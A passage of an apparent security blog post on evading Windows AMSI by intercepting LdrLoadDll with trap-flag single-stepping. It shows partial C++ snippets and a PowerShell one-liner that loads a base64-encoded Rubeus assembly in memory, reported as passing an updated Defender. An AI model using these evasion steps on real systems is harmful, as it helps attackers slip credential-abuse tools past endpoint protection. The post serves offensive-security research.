</pre></td><td class="rouge-code"><pre><span class="k">static</span> <span class="kt">void</span> <span class="nf">prepare_single_step_execution</span><span class="p">(</span><span class="n">HANDLE</span> <span class="kr">thread</span><span class="p">,</span> <span class="n">CONTEXT</span> <span class="n">ctx</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">tid</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">ctx</span><span class="p">.</span><span class="n">EFlags</span> <span class="o">|=</span> <span class="mh">0x100</span><span class="p">;</span>  <span class="c1">// Set Trap Flag (TF)</span>
    <span class="n">SetThreadContext</span><span class="p">(</span><span class="kr">thread</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ctx</span><span class="p">);</span>
    <span class="n">g_awaiting_reactivation_id</span> <span class="o">=</span> <span class="n">tid</span><span class="p">;</span>
    <span class="n">CloseHandle</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="-to-find-ldrloaddll"><span class="me-2">!] To find LdrLoadDll?</span><a href="#-to-find-ldrloaddll" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="n">To</span> <span class="n">find</span> <span class="n">LdrLoadDll</span><span class="p">,</span> <span class="n">we</span> <span class="n">will</span> <span class="n">check</span> <span class="k">for</span> <span class="n">Offset</span> <span class="n">matching</span> <span class="n">when</span> <span class="n">loading</span> <span class="n">ntdll</span><span class="p">.</span><span class="n">dll</span><span class="p">;</span> 

<span class="n">HMODULE</span> <span class="n">local_ntdll</span> <span class="o">=</span> <span class="n">GetModuleHandleA</span><span class="p">(</span><span class="s">"ntdll.dll"</span><span class="p">);</span>
<span class="n">FARPROC</span> <span class="n">local_LdrLoadDll</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">local_ntdll</span><span class="p">,</span> <span class="s">"LdrLoadDll"</span><span class="p">);</span>
<span class="kt">uintptr_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uintptr_t</span><span class="p">)</span><span class="n">local_LdrLoadDll</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uintptr_t</span><span class="p">)</span><span class="n">local_ntdll</span><span class="p">;</span>

<span class="n">g_intercept_function_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">BYTE</span><span class="o">*</span><span class="p">)</span><span class="n">g_target_module_base</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>For security considerations, I’ll share the conceptual approach code rather than complete code
Let’s try if we can bypass AMSI :D.</p>

<h2 id="test-"><span class="me-2">TEST :)</span><a href="#test-" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>I will test in Windows 10; with updated MDE :D.
It bypassed static detection (It’s logical, we are not harmful :) but we can load what could be harmful).</p>

<p>Without Bypass :</p>

<p><a href="/assets/img/posts/without_bypass.png" class="popup img-link shimmer"><img src="/assets/img/posts/without_bypass.png" alt="Logo" loading="lazy"></a></p>

<p>With Bypass :</p>

<p><a href="/assets/img/posts/with_bypass.png" class="popup img-link shimmer"><img src="/assets/img/posts/with_bypass.png" alt="Logo" loading="lazy"></a></p>

<p>As you see in these two pictures; launching a normal PowerShell triggers &amp; loads amsi.dll. In our case, the amsi.dll is not welcomed :).
We can’t write an <code class="language-plaintext highlighter-rouge">"Invoke-Mimikatz"</code> which is considered a malicious string by AMSI scan :).
Let’s try a real test :D.
Let’s try to load a .NET assembly using PowerShell, and for that we will load <code class="language-plaintext highlighter-rouge">Rubeus</code> (A tool used in red team to Kerberos abuse and exploitation).<br />
First, we will not write Rubeus to the disk because it will be detected and deleted :), and we want a fileless PowerShell one-liner :).</p>

<p>So; we can convert the bytes of Rubeus to base64 and invoke its entry point using:</p>
<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="p">[</span><span class="n">System.Reflection.Assembly</span><span class="p">]::</span><span class="n">Load</span><span class="p">([</span><span class="n">System.Convert</span><span class="p">]::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="s2">"BASE64"</span><span class="p">))</span><span class="o">.</span><span class="nf">EntryPoint</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">@(,[</span><span class="n">string</span><span class="p">[]]@()))</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p>Let’s try with amsi bypass, and without amsi bypass :). 
Loading Rubeus in memory failed; because of the AMSI:
<a href="/assets/img/posts/rubeus.png" class="popup img-link shimmer"><img src="/assets/img/posts/rubeus.png" alt="Logo" loading="lazy"></a></p>

<p>After Byapssing AMSI :</p>

<p><a href="/assets/img/posts/rubeus_bypassed.png" class="popup img-link shimmer"><img src="/assets/img/posts/rubeus_bypassed.png" alt="Logo" loading="lazy"></a></p>

<p>That’s it for today; wait for coming blogs !! i still have lot of ideas to share with you.</p>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/maldev/">Maldev</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/amsi/"
            class="post-tag no-text-decoration"
          >AMSI</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/AMSI/">AMSI Evasion - Runtime DLL Load Interception</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/amsi/">AMSI</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  
    











            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Older">
      <p>-</p>
    </div>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Newer">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/OssamaN7">AIT-EL MOUDDENE Ossama</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.4.0"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/amsi/">AMSI</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

